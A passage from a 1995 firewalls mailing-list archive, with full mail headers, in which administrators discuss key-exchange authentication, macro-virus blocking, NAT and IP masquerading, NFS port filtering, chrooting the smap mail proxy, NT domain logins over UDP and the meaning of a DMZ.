just forgot to mention it. (Hoi, Luc) The question now is. I've heard a lot of good things about NetSP Gateway at different places. Are there some clients of this product on this list, that I can contact to ask them about their experiences? Toon Mordijck CEM-Groep Boerenbond, Belgium toon@cem-bb.e-mail.com From firewalls-owner Wed Oct 4 06:23:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA13624 for firewalls-outgoing; Wed, 4 Oct 1995 06:15:32 -0700 Received: from gatekeeper.ddp.state.me.us (gatekeeper.ddp.state.me.us [141.114.130.70]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id GAA13617 for ; Wed, 4 Oct 1995 06:15:29 -0700 Received: from localhost by gatekeeper.ddp.state.me.us (8.6.5/1.37) id JAA03088; Wed, 4 Oct 1995 09:07:57 -0400 Date: Wed, 4 Oct 1995 09:07:56 -0400 (EDT) From: David Miller Subject: Re: Encryption strength To: Frank Willoughby cc: firewalls@GreatCircle.com In-Reply-To: <9510032135.AA29112@su1.in.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 3 Oct 1995, Frank Willoughby wrote: > >From padgett's excellent mail: > > > >Further, key management is a perenniel problem. "How is that first secure > >link established ?" is a chicken and the egg kind of problem. Today out-of- > >channel is the most popular answer as demonstrated by Netscape but is either > >a logistical nightmare or potential weakness. (It might be cheaper to buy > >ViaSign than to break their certificates). > > Actually, the key management problem was solved by V-ONE a couple of years > ago. (V-ONE is a firewall vendor). > > After the host & the firewall have mutually authenticated themselves to each > other (to prevent node spoofing), the entire session is encrypted - with each > session having a *different* (unique) encryption key. But this is the crux of the chicken-and-egg problem. How do they mutually authenticate each other? If they do it with a shared secret or through prior arrangement a secure channel had to previously exist. If there is no third pary/shared secret then it's subject to a man-in-the-middle attack. Now if *thats* been solved, I'd be *delighted* to hear about it! --- David ---------------------------------------------------------------------------- It's *amazing* what one can accomplish when one doesn't know what one can't do! From firewalls-owner Wed Oct 4 06:52:36 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA13963 for firewalls-outgoing; Wed, 4 Oct 1995 06:31:24 -0700 Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA13956 for ; Wed, 4 Oct 1995 06:31:16 -0700 Date: Wed, 4 Oct 1995 9:29:47 -0400 (EDT) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <951004092947.2105ed38@hobbes.orl.mmc.com> Subject: Re: Mail proxy Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >1) it is *impossible* to prevent a determined individual from >transferring executables via email. (But you can slow them down) Quibble: if you block the common mechanisms, then it will take ->two<- individuals, one - perhaps unwitting - to install the decode/execute mechanism on the inside. >However, I must admit that I'd be interested in a Word document macro >virus scanner :) These "executable content" vira are an interesting >breed. Still think "scanners" are not a global solution. Am not particularly interested in providing a steady income to some for "updates", just want to block the spread. Now all you need for that is to disallow execution of macros from documents (with notice that the document contains one). *Documents are not supposed to contain macros*. The fact that they CAN and that the default installion of WORD will execute them are some of the causes of the current problem. Of course if we demonstrate how easy it is to block them (either with DisableAutoMacros or by using a viewer like the free one that comes from Microsloth), maybe they will go the way of ANSI bombs and writing to CLK$. Warmly, Padgett From firewalls-owner Wed Oct 4 07:00:38 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA14097 for firewalls-outgoing; Wed, 4 Oct 1995 06:47:14 -0700 Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA14083 for ; Wed, 4 Oct 1995 06:47:10 -0700 Date: Wed, 4 Oct 1995 9:45:44 -0400 (EDT) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <951004094544.2105ed38@hobbes.orl.mmc.com> Subject: re: Encryption Strength Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Would it suffice to say that it was good enough for NSA - and that it is the >*only* Internet firewall used in a NSA-approved configuration? In a public >forum, this is probably all I can say. No, a) Cryptic remarks like that have no place on a public forum IMNSHO and are considered free of content. Better not to be said at all. b) Was talking to X-3 (dept id, not a code name 8*) yesterday and it was not mentioned. Asked specifically about firewalls (true those folks do not volunteer and I was asking about another subject but did ask specifically which firewalls had been "examined"). c) "Security by obscurity" rates a "Run, do not Walk". d) "Assume" you refer to the MISSI stuff approved for connection of up-to-Secret LANs to unclassified. Those I know of still require an out-of-channel exchange to take place to define "trust". e) The NSA/NIST/NCSA conference in Baltimore next week will be a good place to discuss such things (plug). Vendor suites with open bars particularly appreciated 8*). Is Tuesday 10th - Friday 13th at the convention center at the Inner Harbour. Don't miss Phillips. Warmly, Padgett From firewalls-owner Wed Oct 4 07:54:55 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id HAA15784 for firewalls-outgoing; Wed, 4 Oct 1995 07:44:32 -0700 Received: from gateway.sctc.com (gateway.sctc.com [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id HAA15776 for ; Wed, 4 Oct 1995 07:44:24 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id JAA23297 for ; Wed, 4 Oct 1995 09:46:09 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 187570000; 4 Oct 95 10:43 CDT Received: from sctc.com by sccmailhost.sctc.com id 044250000; 4 Oct 95 10:42 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.10) with ESMTP id JAA19812; Wed, 4 Oct 1995 09:42:36 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id JAA02645; Wed, 4 Oct 1995 09:42:35 -0500 Date: Wed, 4 Oct 1995 09:42:35 -0500 From: Rick Smith Message-Id: <199510041442.JAA02645@shade.sctc.com> To: firewalls@greatcircle.com Cc: smith@sctc.com Subject: Re: Encryption strength References: <9510040306.AA12903@su1.in.net> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk frankw@in.net (Frank Willoughby) says: >>>Actually, the key management problem was solved by V-ONE a couple of years >>>ago. (V-ONE is a firewall vendor). >Padgett asks the obvious: >>Sounds wonderful but pray tell *how* do they authenticate each other ? >So Frank rites: >Would it suffice to say that it was good enough for NSA - and that it is the >*only* Internet firewall used in a NSA-approved configuration? In a public >forum, this is probably all I can say. Interesting. The only "approved configuration" I know of wasn't so much NSA as DISA, and the cryptographic services were irrelevant to its application. If you really do know of an "approved configuration" involving crypto on a commercial firewall, then there are at least *two* different "approved configurations" out there. There have been several "solutions" to the "key management problem," and so far nobody, not even NSA, has come up with one that solves everything. Choosing a key management scheme is just like any other big mechanism decision: it depends on what your threats and operational objectives are. PGP takes one approach yielding one set of results, FORTEZZA takes another. It is true that we can't pick apart the details of whatever these government configurations *are* in a public forum. However, I suspect that any 2 year old commercial implementation is probably at most proprietary information. Most likely there's a public whitepaper describing what V-One does, and how. If V-One (or its crypto implementer) is represented on this list, it might be interesting to hear a first hand report of what they really achieve. Rick. smith@sctc.com secure computing corporation From firewalls-owner Wed Oct 4 08:33:32 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA16920 for firewalls-outgoing; Wed, 4 Oct 1995 08:24:21 -0700 Received: from neon.ingenia.com (neon.ingenia.com [134.117.55.86]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA16913 for ; Wed, 4 Oct 1995 08:24:17 -0700 Received: (from shaver@localhost) by neon.ingenia.com (8.6.12/8.6.9) id LAA11947; Wed, 4 Oct 1995 11:24:13 -0400 From: Mike Shaver Message-Id: <199510041524.LAA11947@neon.ingenia.com> Subject: Network Address Translation stuff To: firewalls@greatcircle.com, paul@vix.com Date: Wed, 4 Oct 1995 11:24:12 -0400 (EDT) X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1658 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Paul Vixie mumbled something vague about: > >I've heard there are a couple of commercial network address translators > >available for those of us who were foolish enough to build extensive > >enterprise networks on non-NIC assigned addresses. Does anyone have any > >real-world experience with such a product? > > At Usenix LISA a few weeks ago in Monterey, CA, the first booth inside the > front door belonged to a company that sold NAT boxes. They appeared to be > based on some BSD flavour, and they wanted to sell hardware rather than just > a software solution. Now if I could only remember their company name. Ah, > here it is in the vendor directory included with my conference materials: > Border Network Technologies; Borderware Firewall Server; . Newer Linux kernels include IP masquerading functionality, which does this sort if thing, in software. (For free, too, which is a nice touch.) The state-of-the-art (which may not be suitable for a production environment; YMMV) includes code to parse FTP packets and alter the PORT lines, and similar support for talk is pending. More information is available at ftp://ftp.eves.com/pub/linux/masq (I think). Mike (who also doesn't follow firewalls as closely as he should... please cc: on response) -- #> Mike Shaver (shaver@ingenia.com) Ingenia Communications Corporation <# #> UNIX medicine man -- dark magick, cheap! <# #> <# #> When the going gets tough, the tough give cryptic error messages. <# #> "We believe in rough consensus and running code." <# From firewalls-owner Wed Oct 4 09:53:14 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA18290 for firewalls-outgoing; Wed, 4 Oct 1995 09:44:21 -0700 Received: from mbunix.mitre.org (mbunix.mitre.org [129.83.20.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA18275 for ; Wed, 4 Oct 1995 09:44:07 -0700 Received: from star9gate.mitre.org (star9gate.mitre.org [129.83.22.1]) by mbunix.mitre.org (8.6.10/8.6.9) with SMTP id MAA06776 for ; Wed, 4 Oct 1995 12:42:35 -0400 Message-ID: Date: 4 Oct 1995 12:46:35 -0500 From: "Pat Heinle" Subject: Re: Firewalls-Digest V4 #573 To: Firewalls@GreatCircle.COM X-Mailer: Mail*Link SMTP-QM 3.0.2 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Reply to: RE>Firewalls-Digest V4 #573 From: pheinle@mitre.org Subject: RE> Borderware vs. Firewall-1 Mr. Tate asks: I am in the process of purchasing a firewall package for the company I work for. I have narrowed my choices down to Borderware and Firewall-1. Which is a better choice, and why? Is there another package out there that is better I may not have seen? rtate@folio.com -- Robert, "Info Security News" just had a supplement to their magazine for Sept/Oct. 95 entitled "Internet Security." Within the "Internet Security" supplement was a section -Shopping for Firewalls which contained a matrix of a majority of the current firewall products and their attributes. It might provided some additional insight. In addition, to your Security Policy which Luc noted in his response, another issue to consider is how well the Firewall product adjusts as your enterprise expands. Good luck. Patty -------------------------------------- Date: 10/4/95 11:34 AM To: Pat Heinle From: Firewalls@GreatCircle.COM !!! Original message was too large. !!! !!! It is contained in the enclosure whose name !!! is the same as the subject of this message. !!! !!! A preview of the message follows: Firewalls-Digest Wednesday, 4 October 1995 Volume 04 : Number 573 In this issue: -No Subject- IRC FLEXlm with proxy ...? Re: NFS Need Windows FTP client source Borderware (was: Information, We want information) Re: Encryption strength Borderware vs. Firewall-1 Exact format for subscribing the info security list. re: Encryption strength re re nfs Re: Mail Proxy Re: FW to FW FTP w/ no port > 1023 re: Encryption strength re: network address translation RE: Borderware vs. Firewall-1 [none] Re: Encryption strength Re: Mail proxy See the end of the digest for information on subscribing to the Firewalls or Firewalls-Digest mailing lists and on how to retrieve back issues. ---------------------------------------------------------------------- From: Joseph Urban Date: 3 Oct 95 14:12:00 Subject: -No Subject- sunscribe firewalls-digest ------------------------------ From: oddboy@vegas.com Date: Tue, 3 Oct 1995 11:42:44 -0700 Subject: IRC I find myself in the position of having to put up a private IRC server (private being not connected to either Undernet or Efnet). Basically this is to allow "chat" forums for a few of my clients. I would like to make these chat lines live outside of my firewall (and plan on it) nut am curious what I should watch out for in terms of folks being able to hack through and into an OS. (i run solaris2.4 but I think the IRC server will run on a DEC box running OSF/DecUnix. Any and all info will be greatly appreciated. Gideon Wober Systems Administrator Digitainment Corporation ------------------------------ From: jordan@Heuristicrat.COM (Jordan M. Hayes) Date: Tue, 3 Oct 95 12:09:16 PDT Subject: FLEXlm with proxy ...? Anyone built a FLEXlm proxy for FWTK? /jordan ------------------------------ From: Doug Hughes Date: Tue, 3 Oct 1995 13:42:56 -0500 Subject: Re: NFS > >I am sure that this topic has been beaten to death, so if someone would >just point me at the discussion (or tell me that there is no solution) >I would be happy to take it from there. I remember reading a paper a >couple years ago describing why NFS could never be made secure, but for >the life of me I cant seem to find it now. > >The problem is SUN's NFS under SUNOS 4.1.3/4. I have a server with a half >dozen file systems that are exported read-only to all the other machines >in the domain. I would like to restrict their mounting to machines within >the domain while maintaining connectivity to the outside world. >SUN's software does not support this option, it only allows specifying >specific machine names, and the list of *all* machine names overflows >some internal limit in SUN's software. > >[ The machine uses DNS and not YP, it is rumored that possibly with YP one >can get by this limit, but I have no interest in adding YP to my list of >problems. ] > >So, the Questions > > (1) WITHOUT resorting to a firewall, is there any way to accomplish >what I want to do? > > (2) If not, can it be done with a `simple' packet filter, or does it >require a full blown firewall? > > > Reg.Clemens > clemens@dwf.com > > > Without necessary resorting to a firewall, you can have your router to the outside world block: port 2049/udp - NFS port 111 udp/tcp - Sun RPC source routed packets outside packets with internal IP source addresses (IP spoofing) This helps prevent a great deal of the most common attacks on NFS by preventing it getting outside your domain at the interface to the Internet. also, installing the replacement tcp_wrappered version of portmap on your NFS servers from ftp.win.tue.nl is also a good thing to do. This way you can limit what networks are able to send RPC requests to your server. - -- ____________________________________________________________________________ Doug Hughes Engineering Network Services System/Net Admin Auburn University doug@eng.auburn.edu Apple T-shirt on Win95 - "Been there, done that" ------------------------------ From: Joe McGuckin Date: Tue From firewalls-owner Wed Oct 4 10:57:46 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA19563 for firewalls-outgoing; Wed, 4 Oct 1995 10:44:55 -0700 Received: from spaatz.cap.af.mil ([132.60.58.245]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA19526 for ; Wed, 4 Oct 1995 10:44:43 -0700 Received: from Microsoft Mail (PU Serial #0) by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.123823.0.11759; Wed, 04 Oct 1995 12:43:30 -0500 From: PADGETT@hobbes.orl.mmc.com (A. Padgett Peterson, P.E. Infor) To: cmilam@cap.au.af.mil, firewalls@greatcircle.com (firewalls) Message-ID: <1995Oct04.123823.0.11759@spaatz.cap.af.mil> X-Mailer: Microsoft Mail via PostalUnion/SMTP for Windows NT Mime-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Organization: Civil Air Patrol National Headquarters Date: Wed, 04 Oct 1995 12:43:30 -0500 Subject: re: Encryption Strength Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Received: from relay4.UU.NET by spaatz.cap.af.mil (PostalUnion/SMTP(tm) v2.1.7 for Windows NT(tm)) id AA-1995Oct04.123619.0.8704; Wed, 04 Oct 1995 12:36:20 -0500 Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP id QQzjzx29201; Wed, 4 Oct 1995 11:18:20 -0400 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id GAA14097 for firewalls-outgoing; Wed, 4 Oct 1995 06:47:14 -0700 Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id GAA14083 for ; Wed, 4 Oct 1995 06:47:10 -0700 Date: Wed, 4 Oct 1995 9:45:44 -0400 (EDT) From: "A. Padgett Peterson, P.E. Information Security" To: firewalls@greatcircle.com Message-Id: <951004094544.2105ed38@hobbes.orl.mmc.com> Subject: re: Encryption Strength Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Would it suffice to say that it was good enough for NSA - and that it is the >*only* Internet firewall used in a NSA-approved configuration? In a public >forum, this is probably all I can say. No, a) Cryptic remarks like that have no place on a public forum IMNSHO and are considered free of content. Better not to be said at all. b) Was talking to X-3 (dept id, not a code name 8*) yesterday and it was not mentioned. Asked specifically about firewalls (true those folks do not volunteer and I was asking about another subject but did ask specifically which firewalls had been "examined"). c) "Security by obscurity" rates a "Run, do not Walk". d) "Assume" you refer to the MISSI stuff approved for connection of up-to-Secret LANs to unclassified. Those I know of still require an out-of-channel exchange to take place to define "trust". e) The NSA/NIST/NCSA conference in Baltimore next week will be a good place to discuss such things (plug). Vendor suites with open bars particularly appreciated 8*). Is Tuesday 10th - Friday 13th at the convention center at the Inner Harbour. Don't miss Phillips. Warmly, Padgett From firewalls-owner Wed Oct 4 12:22:53 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA21185 for firewalls-outgoing; Wed, 4 Oct 1995 12:02:13 -0700 Received: from lonestar.jsc.nasa.gov (lonestar.jsc.nasa.gov [139.169.137.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA21178 for ; Wed, 4 Oct 1995 12:02:09 -0700 Received: from mickey.jsc.nasa.gov by lonestar.jsc.nasa.gov; Wed, 4 Oct 95 14:02:26 -0500 Received: from janus.jsc.nasa.gov by mickey.jsc.nasa.gov (5.65c/ISL-ser-1.2) id AA25464; Wed, 4 Oct 1995 14:00:43 -0500 Received: by janus.jsc.nasa.gov (5.65c/ISL-cli-1.1) id AA25204; Wed, 4 Oct 1995 14:00:42 -0500 Received: from freefall.jsc.nasa.gov(139.169.132.24) by janus.jsc.nasa.gov via smap (V1.3) id sma025201; Wed Oct 4 14:00:11 1995 Received: by freefall.jsc.nasa.gov (8.6.9/ISL-cli-1.1) id OAA00439; Wed, 4 Oct 1995 14:00:11 -0500 From: mark.horn1@jsc.nasa.gov Message-Id: <199510041900.OAA00439@freefall.jsc.nasa.gov> Subject: Technical details of NT Domains.. To: firewalls@greatcircle.com Date: Wed, 4 Oct 1995 14:00:11 -0500 (CDT) X-Mailer: ELM [version 2.4 PL24 ME5a] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 2058 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, We have some users who need to login to a windows NT domain that has been set up here. We currently have an IP firewall installed. This firewall is installed on our LAN and protects us from the Internet. Since there isn't a site wide firewall, it also protects us from the rest of JSC. Its a screened host gateway (Nomenclature taken from Marcus J. Ranum's "Thinking About Firewalls"). Currently, only IP is filtered at our firewall. All non-IP protocolas are passed through. All non-IP protocols are filtered at the site's connection to the Internet. Now, it turns out that my users can't login to an NT domain. I wouldn't have expected this because I assumed that NT would have used NetBEUI or some such other non-IP protocol to communicate. After some experimentation, I've discovered that I need to set up the following for this to work: a) Each Win95 machine needs to have a WINS server configured b) UDP needs to be wide open to that Win95 machine. It looks like WINS is a UDP based protocol, and it manages the name resolution for the NT domain. Then, using some unknown protocol, our machines talk to the NT domain server for authentication. From there, they talk to the individual disk servers in the NT domain over NetBEUI. (All of this is not much more than a Wild Ass Guess (tm)) So, the questions is can anyone tell me the specifics of how one logs into an NT domain? In particular, what are the details of the data exchange? What I'm looking for is something along the lines of how Brent Chapman describes protocols in his tutorials (e.g. NTP servers send to & from UDP port 123, NTP clients send to UDP 123, and from random UDP port >1023). Does anyone know how logging into an NT domain utilizes UDP? If WINS is the only thing using UDP, has anyone set up udprelay to act as a proxy for it? Thanks in advance. -- Mark Horn (sparkie) horn@mickey.jsc.nasa.gov http://tommy.jsc.nasa.gov/~horn mark.horn1@jsc.nasa.gov Free Advice and Opinions -- Refunds Available From firewalls-owner Wed Oct 4 12:53:18 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA21663 for firewalls-outgoing; Wed, 4 Oct 1995 12:30:04 -0700 Received: from netcom11.netcom.com (netcom11.netcom.com [192.100.81.121]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA21656 for ; Wed, 4 Oct 1995 12:30:01 -0700 Received: by netcom11.netcom.com (8.6.12/Netcom) id MAA22431; Wed, 4 Oct 1995 12:28:23 -0700 From: okuyama@netcom.com (Darin Okuyama) Message-Id: <199510041928.MAA22431@netcom11.netcom.com> Subject: running "smapd" chrooted .. To: firewalls@greatcircle.com (Firewall Mailing List) Date: Wed, 4 Oct 1995 12:28:23 -0700 (PDT) X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 485 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My firewall has the following configuration for "smap" and "smapd": smap, smapd: directory /var/mail According to the documentation, "smap" does a chroot to the specified directory, but it seems "smapd" doesn't. Questions: 1. Is running "smapd" chrooted a lot safer than not? 2. What exactly would it take to run "smapd" chrooted? 3. If one is running "smapd" chrooted, I suppose one should run the periodic check of the "mqueue" chrooted too? ---Darin Okuyama From firewalls-owner Wed Oct 4 13:54:02 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA24485 for firewalls-outgoing; Wed, 4 Oct 1995 13:49:23 -0700 Received: from gw.home.vix.com (gw.home.vix.com [192.5.5.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA24477 for ; Wed, 4 Oct 1995 13:49:18 -0700 Received: by gw.home.vix.com id AA27100; Wed, 4 Oct 95 13:47:47 -0700 X-Btw: vix.com is also gw.home.vix.com and vixie.sf.ca.us Received: by wisdom.home.vix.com id AA27158; Wed, 4 Oct 1995 13:47:46 -0700 Message-Id: <9510042047.AA27158@wisdom.home.vix.com> To: firewalls@greatcircle.com Cc: Mike Shaver Subject: Re: Network Address Translation stuff In-Reply-To: Your message of "Wed, 04 Oct 1995 11:24:12 EDT." <199510041524.LAA11947@neon.ingenia.com> Date: Wed, 04 Oct 1995 13:47:46 -0700 From: Paul A Vixie Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Newer Linux kernels include IP masquerading functionality, which does > this sort if thing, in software. (For free, too, which is a nice > touch.) > > The state-of-the-art (which may not be suitable for a production > environment; YMMV) includes code to parse FTP packets and alter the > PORT lines, and similar support for talk is pending. I guess I thought this would have gone without saying, but I don't agree with the idea of modifying PORT verbs in stream -- this is a very slippery slope indeed. IBM's NAT does FTP proxying via DNS tricks and temporary address assignments, and accomplishes its goals without any layering violations -- in particular the user data is never interpreted. This goes to show that it can be done without searching for PORT verbs in user data. From firewalls-owner Wed Oct 4 15:54:00 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA00836 for firewalls-outgoing; Wed, 4 Oct 1995 15:47:44 -0700 Received: from provider.ins.com (provider.ins.com [199.0.194.125]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA00829 for ; Wed, 4 Oct 1995 15:47:34 -0700 Received: from mattpc.ins.com (lab_pc.ins.com [199.0.193.229]) by provider.ins.com (8.6.12/8.6.12) with SMTP id SAA08983 for ; Wed, 4 Oct 1995 18:45:57 -0400 Date: Wed, 4 Oct 1995 18:45:57 -0400 Message-Id: <199510042245.SAA08983@provider.ins.com> X-Sender: waugh@provider.ins.com X-Mailer: Windows Eudora Version 2.1.1 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: firewalls@greatcircle.com From: Matthew Waugh Subject: Re: running "smapd" chrooted .. Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Thats a strange configuration - you send smap to some separate area so that if it is broken into there is nothing it can access, it appears your setup is giving away access to the mailboxes. Anyway - the reason smap runs chroot is because its the process listening on port 25. Its supposed to be a simple, clearly understood program that is not susceptible to attack - and even if attacked all it allows is access to some restricted chroot area. On the other hand smapd takes the output of smap, is not running with privilege, and so it can hand the message off to sendmail with less risk of a mail message giving access to the system. Off-hand, running smapd chroot would be possible, but awfully difficult, because what you actually end up doing is running sendmail chrooted (all smapd does is format traffic and give it to sendmail). If running sendmail chroot was easy we'd probably be doing that and not running smap/smapd. You'd probably have to include so much of the system in your chroot area for smapd that the actual security obtained would be minimal. Mat At 12:28 PM 10/4/95 -0700, you wrote: > >My firewall has the following configuration for "smap" and "smapd": > > smap, smapd: directory /var/mail > >According to the documentation, "smap" does a chroot to the specified >directory, but it seems "smapd" doesn't. Questions: > > 1. Is running "smapd" chrooted a lot safer than not? > > 2. What exactly would it take to run "smapd" chrooted? > > 3. If one is running "smapd" chrooted, I suppose one should run > the periodic check of the "mqueue" chrooted too? > >---Darin Okuyama > > > -- Matthew Waugh Matthew_Waugh@ins.com INS - Raleigh, NC From firewalls-owner Wed Oct 4 16:22:55 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA01758 for firewalls-outgoing; Wed, 4 Oct 1995 16:18:21 -0700 Received: from inet-smtp-gw-1.us.oracle.com (inet-smtp-gw-1.us.oracle.com [192.86.155.81]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA01751 for ; Wed, 4 Oct 1995 16:18:03 -0700 Received: from mailsun2.us.oracle.com by inet-smtp-gw-1.us.oracle.com with SMTP (8.6.12/37.7) id QAA25555; Wed, 4 Oct 1995 16:16:31 -0700 Received: by mailsun2.us.oracle.com (4.1/37.8) id AA28157; Wed, 4 Oct 95 16:17:21 PDT Message-Id: <9510042317.AA28157@mailsun2.us.oracle.com> Date: 04 Oct 95 16:09:49 -0700 From: "David Sidwell" To: firewalls@greatcircle.com Subject: DMZ definition ? Reply-To: dasidwel@us.oracle.com Mime-Version: 1.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Can anyone give me a concise defition of the term Demilitarized Zone, or DMZ for short, in connection with firewall terminology ? I am under the belief, perhaps incorrectly, that it is used to refer to any kind of screened subnet placed between the internal networks and the Internet (or other external networks). A colleague of mine is convinced that it is a separate subnet hung off a single firewall machine. So would the follwoing be correctly termed DMZ's or not ? 1. [ packet ] [ packet ] Internet---[filtering]----DMZ subnet----[filtering]---internal [ router ] (containing [ router ] networks publically accessible machines) 2. As above but protected by firewalls instead of packet filtering routers. 3. Internet----firewall----internal networks... | | DMZ subnet Finally, does a DMZ implementation always prevent direct IP forwarding from Internet to internal nets ? TIA, David Sidwell From firewalls-owner Wed Oct 4 16:30:10 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA01038 for firewalls-outgoing; Wed, 4 Oct 1995 15:59:24 -0700 Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA01031 for ; Wed, 4 Oct 1995 15:59:21 -0700 Received: from ford.gbnet.org by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950602) id PAA02823; Wed, 4 Oct 1995 15:50:50 -0700 Received: (from steve@localhost) by ford.gbnet.org (8.7.Beta.10/8.6.12) id XAA15887; Wed, 4 Oct 1995 23:53:43 +0100 (BST) From: Steve Kennedy Message-Id: <199510042253.XAA15887@ford.gbnet.org> Subject: Re: Technical details of NT Domains.. To: mark.horn1@jsc.nasa.gov Date: Wed, 4 Oct 1995 23:53:43 +0100 (BST) Cc: firewalls@GreatCircle.COM In-Reply-To: <199510041900.OAA00439@freefall.jsc.nasa.gov> from "mark.horn1@jsc.nasa.gov" at Oct 4, 95 02:00:11 pm X-Mailer: ELM [version 2.4 PL24alpha3] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to mark.horn1@jsc.nasa.gov > So, the questions is can anyone tell me the specifics of how one logs into an > NT domain? In particular, what are the details of the data exchange? What > I'm looking for is something along the lines of how Brent Chapman describes > protocols in his tutorials (e.g. NTP servers send to & from UDP port 123, NTP > clients send to UDP 123, and from random UDP port >1023). Does anyone know > how logging into an NT domain utilizes UDP? check out Samba (SMB server for UNIX). This will shortly support master browsing and domain controller functionality. The master site is ftp://nimbus.anu.edu.au/pub/tridge/samba (or very similar - it's late here) - though mirrored in lots of places. It has pretty good docs with it and explains how logging in etc work. Regards Steve -- home steve@gbnet.org * Flat 2, 43 Howitt Road, Belsize Pk, London NW3 4LU work steve@demon.net * tel +44-(0)171 483 1169 FAX +44-(0)181 444 6103 www http://www.gbnet.net/ * GSM mobile +44-(0)802 444 500 bits steve@gbnet.net * GSM data @2400 0802-449500 @9600 449501 fax 449502 Euro firewall info - send mail to majordomo@gbnet.net (subscribe firewalls-uk) From firewalls-owner Wed Oct 4 16:52:40 1995 Received: (majordom@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA01823 for firewalls-outgoing; Wed, 4 Oct 1995 16:23:40 -0700 Received: from prometheus.microchip.com (PROMETHEUS.MICROCHIP.COM [198.175.253.66]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id QAA01816 for ; Wed, 4 Oct 1995 16:23:36 -0700 Received: (from daemon@localhost) by prometheus.microchip.com (8.6.12/8.6.9) id QAA02185 for ; Wed, 4 Oct 1995 16:27:38 -0700 Received: from pegasus.microchip.com(199.170.150.38) by prometheus.microchip.com via smap (V1.3) id sma002183; Wed Oct 4 16:27:25 1995 Received: from localhost (localhost.Microchip.COM [127.0.0.1]) by pegasus.Microchip.COM (8.7/8.7) with ESMTP id QAA08533; Wed, 4 Oct 1995 16:11:07 -0700 (MST) Message-Id: <199510042311.QAA08533@pegasus.Microchip.COM> To: Snow-Flower cc: Firewalls@greatcircle.com Subject: Re: Exact format for subscribing the info security list. In-reply-to: Your message of 